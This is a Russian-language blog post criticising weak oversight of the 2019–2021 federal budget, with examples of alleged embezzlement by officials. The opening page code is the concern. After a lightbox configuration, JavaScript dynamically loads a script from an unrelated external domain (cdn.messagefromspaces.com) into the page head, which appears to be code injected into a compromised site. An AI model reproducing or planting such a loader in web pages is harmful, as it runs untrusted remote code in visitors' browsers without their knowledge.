, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Кто обеспечит сохранность и целевое использование бюджета?

16 Ноя

СМИ сообщают о том, что  Госдума одобрила во втором, основном, чтении проект федерального бюджета на 2019 год и плановый период 2020 — 2021 годов. Рассказывают, какое в бюджете «трёхлетки» дополнительное финансирование в рамках нацпроектов получило   каждое из приоритетных направлений.

Особо подчеркивают тот факт, что депутаты проголосовали за решение конкретных социальных проблем, за повышение качества жизни и социальной защиты людей, но при этом умалчивают о том, насколько возросло денежное содержание самих депутатов.

В бюджете на 2019 год планируются доходы в размере 19,969 триллиона рублей, расходы — 18,037 триллиона рублей. Профицит составит 1,932 триллиона рублей.

Огромные деньги, но кто и как собирается обеспечить их сохранность и целевое использование?

Об этом молчат  все ведомства обязанные контролировать бюджет. Никто никаких обязательств не берёт.

Но контролем  должны заниматься  сами депутаты.

Разве исключены случаи разбазаривания бюджетных средств путём чтения сомнительных «лекций»  на уровне Ломоносова, продолжительностью   15−30 минут, за которые,  не имеющий высшего образования депутат Илья Пономарёв получал от фонда «Сколково» https://www.1tv.ru/news/2013−04−19/73572-deputat_ilya_ponomaryov_poluchal_30_tysyach_dollarov_za_lektsiyu_ot_fonda_skolkovo  30 тысяч долларов за лекцию?

А сколько подобных «лекторов»  так  приходуют бюджетные средства по стране в год?

Отмалчиваются и правоохранительные органы, словно не было в их рядах полковника Захарченко, что соучаствовал в распиле бюджетных средств и миллиарды хранил в квартире. Сыщики обнаружили  у него только часть теневого олимпийского бюджета.

В этой связи большие опасения возникают  по сохранности тех миллиардов, что выделены на спорт.

Недавние события, связанные со свердловской чиновницей Глацких, требуют ответа на  вопрос: Какие приняты меры по разворовыванию бюджетных средств, что выделены регионам?

Обязанные контролировать  бюджет сами не озадачились, почему он так расходуется.  Это сделали журналисты, которых смутило, что  мероприятия для молодежи проходили не на природе, не в пионерских лагерях, а в отеле премиум-класса, хотя занятия вели обычные учителя, оплата труда которых не может стоить заявленных в смете сумм.

Только после этого Следственный комитет приступил к проверке траты 131 млн, выделенных Департаменту на реализацию проектов по поддержке талантливой молодежи.

Много вопросов и по поводу того имущества, которое она задекларировала https://ria.ru/society/20181105/1532155036.html

У чиновницы в собственности находятся два земельных участка площадью 900 и 533 квадратных метра, квартира площадью 116 «квадратов» и гараж. Кроме того, в ее пользовании находятся еще две квартиры. Из транспортных средств она задекларировала Mercedes-Benz ML 350 и Lada 212140.

Создаётся впечатление, что формирующие бюджет, не заботясь о его защите, не называя тех, кто несёт персональную ответственность за сохранность бюджетных средств,  заранее создают условия для его нецелевого использования и разворовывания.

Казалось, что самое время дать широкое применение п.п. 8 п. 2 статьи 235 ГК РФ, по обращению в доход государства имущества, в отношении которого чиновник не имеет доказательств  его приобретения на законные доходы.

Но с этим большая беда уже у гаранта Конституции  Владимира Путина.

По действующему законодательству, только сотрудники Администрации Путина обладают правом собирать материалы для применения п.п. 8 п. 2 ст. 235 ГК РФ.

Но в своё время глава Администрации Президента Сергей Иванов огорчался по поводу того, что декларации губернаторов Хорошавина и Гайзера,  его подчинённые посчитали https://www.mk.ru/politics/2015/11/02/sergey-ivanov-deklaracii-khoroshavina-i-gayzera-chishhe-slezy-papy-rimskogo.html   чище слезы Папы Римского.

Сейчас Следственный комитет России (СКР) расследует https://www.kommersant.ru/doc/3771134        беспрецедентное уголовное дело о мошенничестве, в котором обвиняется действующий полковник ФСБ Михаил Горбатов, еще полгода назад руководивший контрольно-инспекционным департаментом управления президента РФ по обеспечению конституционных прав граждан. На работе офицер следил за исполнением президентских указов, касающихся помилования и предоставления политического убежища, а в свободное время, как полагает следствие, помогал своим подельникам «кошмарить» коммерсантов.

Нет людей, которым можно было бы доверить применение п.п. 8 п. 2 ст. 235 ГК РФ. Пора распускать отдел кадров, что формировал состав  таких помощников главе государства.

Поэтому, Мы россияне,  обречены слушать очередные рассказы  руководителя Счётной палаты о миллиардных нецелевых  использованиях бюджетных средств, а СМИ отыскивать новых членов правительства, депутатов, иных чиновников, что соучаствуют в разворовывании того, что принадлежит всему народу и должно использоваться для того, чтобы россияне имели достойные пенсии и социальные выплаты.

Но мы сами захотели такой жизни ещё на шесть лет. Первую «трёхлетку» начинаем.

Впереди нас ждут интересные истории с утверждением бюджета очередной «трёхлетки», а про то, как и кто обязан бюджет сохранять, мы опять ничего не узнаем.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.